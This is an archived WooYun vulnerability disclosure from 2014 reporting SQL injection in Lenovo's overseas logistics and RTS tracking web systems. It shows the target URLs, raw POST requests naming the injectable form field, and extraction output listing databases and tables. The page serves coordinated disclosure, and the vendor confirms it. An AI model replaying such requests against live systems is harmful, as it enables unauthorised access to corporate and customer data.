当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048459

漏洞标题:联想某海外多个系统存在SQL注射导致信息泄露

相关厂商:联想

漏洞作者: Mr.leo

提交时间:2014-01-10 12:02

修复时间:2014-02-24 12:03

公开时间:2014-02-24 12:03

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-10: 细节已通知厂商并且等待厂商处理中
2014-01-13: 厂商已经确认,细节仅向厂商公开
2014-01-23: 细节向核心白帽子及相关领域专家公开
2014-02-02: 细节向普通白帽子公开
2014-02-12: 细节向实习白帽子公开
2014-02-24: 细节向公众公开

简要描述:

联想某海外多个系统存在SQL注射导致信息泄露,涉及到好几个系统,希望不是小厂商了。

详细说明:

站点:
http://lis.lenovo.com/LISV2/ 物流信息系统

206.jpg


http://lis.lenovo.com/RTS/ RTS跟踪系统

1233.jpg


与此漏洞的注入参数相同,因为涉及到多个系统,请厂商整站自查一下,有没有其他遗漏的子系统 WooYun: 联想某海外系统存在SQL注射导致信息泄露 

POST http://lis.lenovo.com/RTS/forgetpwd.aspx HTTP/1.1
Host: lis.lenovo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://lis.lenovo.com/RTS/forgetpwd.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1095
ToolkitScriptManager1_HiddenField=%3B%3BAjaxControlToolkit%2C+Version%3D3.5.40412.0%2C+Culture%3Dneutral%2C+PublicKeyToken%3D28f01b0e84b6d53e%3Aen-US%3A1547e793-5b7e-48fe-8490-03a375b13a33%3Ade1feab2%3Af9cec9bc%3Aa67c2700%3Af2c8e708%3A8613aea7%3A3202a5a2%3Aab09e3fe%3A87104b7c%3Abe6fb298%3A720a52bf%3A589eaa30%3A698129cf%3Ae148b24b&__EVENTTARGET=btnProceed&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTAzODU1MjA5MQ9kFgICAw9kFgYCAQ8WAh4Fc3R5bGUFS2JhY2tncm91bmQtaW1hZ2U6dXJsKEltYWdlcy9SVFNfQmFubmVyXzkwMHg2MC5wbmcpO2hlaWdodDo2MHB4O3dpZHRoOjkwMHB4O2QCCw9kFgICAw8PFgIeBFRleHRkZGQCDQ8PFgIfAQUSIExFTk9WTyAtIFJUUyAyMDE0ZGRka9mr9YhGZYnk7Hkrn5U7Ioursgc%3D&__PREVIOUSPAGE=u9NeTchv2xiGhUWqAqY5Rfh-p6TsnKBCrgMFzXKfR0t07ShY7hUJlmma2elUYb0qvexCeXJXXSF3to0Apg9_Qrb3xck1&__EVENTVALIDATION=%2FwEWDgLRg6%2BjCQLQr4CuCgLjh8%2BzAgK9o7eoAQL7g77nDALn6oHDDAKG9P%2FCDAKUsvdnApTlme4OAo%2BfjvwCAvvjkIIIAruTnMMMAt7u54sIApP4%2BZoIqKrh2EWMzkkTXiqcyH1VtbSdECk%3D&txt_mailid=123%40lenovo.com&ValidatorCalloutExtender4_ClientState=&ValidatorCalloutExtender5_ClientState=&cmb_User_Type=CUSTOMER&ValidatorCalloutExtender8_ClientState=
POST http://lis.lenovo.com/LISV2/ HTTP/1.1
Host: lis.lenovo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://lis.lenovo.com/LISV2/
Cookie: ASP.NET_SessionId=z4lqclmhx42ljprmfqwm1dpe
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 908
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJOTIyMTc3ODA3D2QWAgIDD2QWBAIZDw8WAh4EVGV4dGVkZAIdDw8WAh8ABawBIExJUyAtICZjb3B5OyAyMDE0IExlbm92by4gQWxsIHJpZ2h0cyByZXNlcnZlZC4gfCA8YSBocmVmPSdodHRwOi8vd3d3Lmxlbm92by5jb20vbGVnYWwvaW4vZW4vJz5UZXJtcyBvZiB1c2U8L2E%2BIHwgPGEgaHJlZj0naHR0cDovL3d3dy5sZW5vdm8uY29tL3ByaXZhY3kvaW4vZW4vJz5Qcml2YWN5PC9hPmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQpDaGtTYXZlUHdkBQxjbG9zZURDUG9wdXBIEr%2F3U6mkHfQ0ajOYsF2X%2BdK%2FBeQrg5N9c7c%2F2%2FsPRg%3D%3D&__EVENTVALIDATION=%2FwEWDQK0pMqXCwKl1bKzCQKp2%2BqIAwKd%2B7qdDgLCyp3HCQLCgr8xAoLch8sJAr2jt6gBArnDi8QFAvuDvucMAufqgcMMAob0%2F8IMAt7u54sIXf42ZfGeGzLm1WECRtk0wKQIw6JuJ%2F73iT1J3pFrE7k%3D&txtUserName=&RF_UID_ValidatorCalloutExtender_ClientState=&txtPwd=&RF_PWD_ValidatorCalloutExtender_ClientState=&txt_mailid=123%40lenovo.com&ValidatorCalloutExtender4_ClientState=&ValidatorCalloutExtender5_ClientState=&btnProceed=Submit
current user:    'lisuser'
current database:    'Lenovo-LIS-India'
available databases [20]:
[*] Lenovo-B2B-ANZ
[*] Lenovo-B2B-Asean
[*] Lenovo-B2B-India
[*] Lenovo-Claims-India
[*] Lenovo-CRM-ANZ
[*] Lenovo-CRM-Asean
[*] Lenovo-Crm-India
[*] Lenovo-DISK11-India
[*] Lenovo-GSC-India
[*] Lenovo-GSC-India-VAS
[*] Lenovo-LIS-India
[*] Lenovo-Marketing-India
[*] Lenovo-REL-Pricing-India
[*] Lenovo-SMB-Pricing-India
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Database: [Lenovo-LIS-India]
[184 tables]
+------------------------------------------------+
| dbo.AUDIT_LOG_DATA                             |
| dbo.AUDIT_LOG_TRANSACTIONS                     |
| dbo.AUDIT_UNDO                                 |
| dbo.AUDIT_VIEW                                 |
| dbo.[Jana.DB_V_Plant_Code]                     |
| dbo.[Jana.ECC_File_Det]                        |
| dbo.[Jana.LV_Activity]                         |
| dbo.[Jana.LV_LIS_ADD_SAP_UPLOAD]               |
| dbo.[Jana.LV_LOTS_PSD_PARTSHIMENT]             |
| dbo.[Jana.LV_LOTS_PSD_VS_BILLED]               |
| dbo.[Jana.LV_REL_BILLING]                      |
| dbo.[Jana.LV_STO_REPORT]                       |
| dbo.[Jana.LV_TOP100CUSTOMER]                   |
| dbo.[Jana.LV_TOP100CUSTOMER_OLD]               |
| dbo.[Jana.Sapinvoice_Auto_Upload]              |
| dbo.[Jana.V_InvBillInfo]                       |
| dbo.[Jana.V_PSD_LIS]                           |
| dbo.[Jana.V_billinfo]                          |
| dbo.[Jana.lm_alert]                            |
| dbo.[Jana.lm_alerthierarchy]                   |
| dbo.[Jana.lm_broadcast]                        |
| dbo.[Jana.lm_carrieraccess]                    |
| dbo.[Jana.lm_city]                             |
| dbo.[Jana.lm_cityaccess]                       |
| dbo.[Jana.lm_contract]                         |
| dbo.[Jana.lm_controlfile]                      |
| dbo.[Jana.lm_cost_matrix]                      |
| dbo.[Jana.lm_custgroupchannel]                 |
| dbo.[Jana.lm_customeraccess]                   |
| dbo.[Jana.lm_custtypeaccess]                   |
| dbo.[Jana.lm_detentionreason]                  |
| dbo.[Jana.lm_distance]                         |
| dbo.[Jana.lm_documentaccess]                   |
| dbo.[Jana.lm_documentmanager]                  |
| dbo.[Jana.lm_duty]                             |
| dbo.[Jana.lm_escalation]                       |
| dbo.[Jana.lm_escalation_old]                   |
| dbo.[Jana.lm_escalationhierarchy]              |
| dbo.[Jana.lm_escalationhierarchy_old]          |
| dbo.[Jana.lm_function]                         |
| dbo.[Jana.lm_functionaccess]                   |
| dbo.[Jana.lm_gscreport]                        |
| dbo.[Jana.lm_holiday]                          |
| dbo.[Jana.lm_lock]                             |
| dbo.[Jana.lm_loggeduser]                       |
| dbo.[Jana.lm_menuaccess]                       |
| dbo.[Jana.lm_motrate]                          |
| dbo.[Jana.lm_parameter]                        |
| dbo.[Jana.lm_parametercategory]                |
| dbo.[Jana.lm_plant]                            |
| dbo.[Jana.lm_preshipmentalert]                 |
| dbo.[Jana.lm_region]                           |
| dbo.[Jana.lm_regionaccess]                     |
| dbo.[Jana.lm_spacevariable]                    |
| dbo.[Jana.lm_user]                             |
| dbo.[Jana.lm_usergroup]                        |
| dbo.[Jana.lm_whaccess]                         |
| dbo.[Jana.lm_whcontact]                        |
| dbo.[Jana.lm_workingtime]                      |
| dbo.[Jana.ls_V_Report_SapVSDSR]                |
| dbo.[Jana.lt_IOD]                              |
| dbo.[Jana.lt_IOD_BACKUP]                       |
| dbo.[Jana.lt_Pod_Link]                         |
| dbo.[Jana.lt_Top100CustomerList]               |
| dbo.[Jana.lt_alertoutbound]                    |
| dbo.[Jana.lt_capex]                            |
| dbo.[Jana.lt_capexhistory]                     |
| dbo.[Jana.lt_dsr]                              |
| dbo.[Jana.lt_dsr_TSP]                          |
| dbo.[Jana.lt_dsr_TSP_HIS]                      |
| dbo.[Jana.lt_dsr_TSP_New]                      |
| dbo.[Jana.lt_dsrhistory]                       |
| dbo.[Jana.lt_grn]                              |
| dbo.[Jana.lt_grnhistory]                       |
| dbo.[Jana.lt_grnhistory_old]                   |
| dbo.[Jana.lt_incident]                         |
| dbo.[Jana.lt_motcr]                            |
| dbo.[Jana.lt_outbound]                         |
| dbo.[Jana.lt_permit]                           |
| dbo.[Jana.lt_podextractlog]                    |
| dbo.[Jana.lt_query]                            |
| dbo.[Jana.lt_sapinvoice]                       |
| dbo.[Jana.lt_sapinvoice_RSO]                   |
| dbo.[Jana.lt_sapinvoice_complete]              |
| dbo.[Jana.lt_sapinvoice_complete_old]          |
| dbo.[Jana.lt_sapinvoice_test]                  |
| dbo.[Jana.lt_sapinvoicehistory]                |
| dbo.[Jana.lt_sapinvoicehistory_old]            |
| dbo.[Jana.lt_stn]                              |
| dbo.[Jana.lt_supplierpayment]                  |
| dbo.[Jana.lt_supplierpaymenthistory]           |
| dbo.[Jana.lt_upload]                           |
| dbo.[Jana.lt_uploadlog]                        |
| dbo.[Jana.lt_warehouse]                        |
| dbo.[Jana.lt_whspace]                          |
| dbo.[Jana.lv_DSR_Report1]                      |
| dbo.[Jana.lv_DSR_Report]                       |
| dbo.[Jana.lv_TSP_operation_Rpt]                |
| dbo.[Jana.lv_TSP_operation_Rpt_Old]            |
| dbo.[Jana.lv_carrier]                          |
| dbo.[Jana.lv_channel]                          |
| dbo.[Jana.lv_custgroup]                        |
| dbo.[Jana.lv_customer]                         |
| dbo.[Jana.lv_delstatus]                        |
| dbo.[Jana.lv_detentionreason]                  |
| dbo.[Jana.lv_dsr_vs_tsp_new]                   |
| dbo.[Jana.lv_dtatfailurecode]                  |
| dbo.[Jana.lv_endcustomer]                      |
| dbo.[Jana.lv_functions]                        |
| dbo.[Jana.lv_lis_ADD_upload]                   |
| dbo.[Jana.lv_mdtatfailurecode]                 |
| dbo.[Jana.lv_mot]                              |
| dbo.[Jana.lv_motcrstatus]                      |
| dbo.[Jana.lv_operation_Rpt]                    |
| dbo.[Jana.lv_otreason]                         |
| dbo.[Jana.lv_plant]                            |
| dbo.[Jana.lv_pod_vs_tsp]                       |
| dbo.[Jana.lv_pod_vs_tsp_new]                   |
| dbo.[Jana.lv_podfailurecode]                   |
| dbo.[Jana.lv_podperf]                          |
| dbo.[Jana.lv_podpref]                          |
| dbo.[Jana.lv_query]                            |
| dbo.[Jana.lv_rejectionreason]                  |
| dbo.[Jana.lv_shipcondition]                    |
| dbo.[Jana.lv_shippingcondition]                |
| dbo.[Jana.lv_systemlock]                       |
| dbo.[Jana.lv_vendor]                           |
| dbo.[Jana.lv_warehouse]                        |
| dbo.[Jana.lv_workdaytype]                      |
| dbo.[Jana.lv_zone]                             |
| dbo.[Jana.new_view]                            |
| dbo.[Jana.sapvsdsr]                            |
| dbo.[Jana.temp_Desktop]                        |
| dbo.[Jana.temp_Net]                            |
| dbo.[Jana.temp_NoteBook]                       |
| dbo.[Jana.test]                                |
| dbo.[REALBASE-DB\\nasurudheen.ACCESS_CONTROL]  |
| dbo.[REALBASE-DB\\nasurudheen.BKBL_RECP_Group] |
| dbo.[REALBASE-DB\\nasurudheen.BackLog]         |
| dbo.[REALBASE-DB\\nasurudheen.Billing]         |
| dbo.[REALBASE-DB\\nasurudheen.Cust_Info]       |
| dbo.[REALBASE-DB\\nasurudheen.HBackLog]        |
| dbo.[REALBASE-DB\\nasurudheen.HBilling]        |
| dbo.[lisuser.R_Cust_Master]                    |
| dbo.[lisuser.ZPL_LABLE_TMPL]                   |
| dbo.[lisweb.AID_Counter]                       |
| dbo.[lisweb.LV_APPROVAL_LOG]                   |
| dbo.[lisweb.R_Access_Ctrl]                     |
| dbo.[lisweb.R_City]                            |
| dbo.[lisweb.R_Cust_RET_Item]                   |
| dbo.[lisweb.R_Cust_RTS_Details]                |
| dbo.[lisweb.R_Delegation_Log]                  |
| dbo.[lisweb.R_Delegation_Profile]              |
| dbo.[lisweb.R_File_Det]                        |
| dbo.[lisweb.R_PLANT_CODE]                      |
| dbo.[lisweb.R_Ret_Type_Master]                 |
| dbo.[lisweb.R_Return_Detail]                   |
| dbo.[lisweb.R_Return_Flow]                     |
| dbo.[lisweb.R_Return_Item]                     |
| dbo.[lisweb.R_Return_Item_oldBackup]           |
| dbo.[lisweb.R_Signup_User]                     |
| dbo.[lisweb.R_WH_Recv_Profile]                 |
| dbo.[lisweb.R_Workflow_Profile]                |
| dbo.[lisweb.Sap_Billed_Data]                   |
| dbo.[lisweb.V1_CUST_Return_Qty_Check]          |
| dbo.[lisweb.V1_CUST_Return_Qty_Det]            |
| dbo.[lisweb.V1_TSP_Return_Qty_Check]           |
| dbo.[lisweb.V1_TSP_Return_Qty_Det]             |
| dbo.[lisweb.V_Cust_VS_TSP_REPORT]              |
| dbo.[lisweb.V_SAP_BILLED_DATA]                 |
| dbo.[lisweb.V_SAP_DISTINCT_COUNT]              |
| dbo.[lisweb.V_TSP_VS_RETDET_Report]            |
| dbo.[lisweb.v1_customer_request]               |
| dbo.[lisweb.v_customer_Request]                |
| dbo.[lisweb.v_customer_request1]               |
| dbo.[lisweb.v_customer_request_RPT]            |
| dbo.[reluser.MASTER_DATA_RPT]                  |
| dbo.[reluser.V_Master_Det]                     |
| dbo.[reluser.access_control]                   |
| dbo.[reluser.log_table]                        |
| dbo.[reluser.modp_cus_inv]                     |
| dbo.[reluser.modp_cus_inv_item]                |
| dbo.[reluser.status_board]                     |
| dbo.sysdiagrams                                |
+------------------------------------------------+


漏洞证明:

已经证明

修复方案:

过滤多个子系统的参数

版权声明:转载请注明来源 Mr.leo@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-01-13 13:56

厂商回复:

感谢您对联想信息安全工作的支持 我们会尽快修复漏洞

最新状态:

暂无

漏洞评价:

评论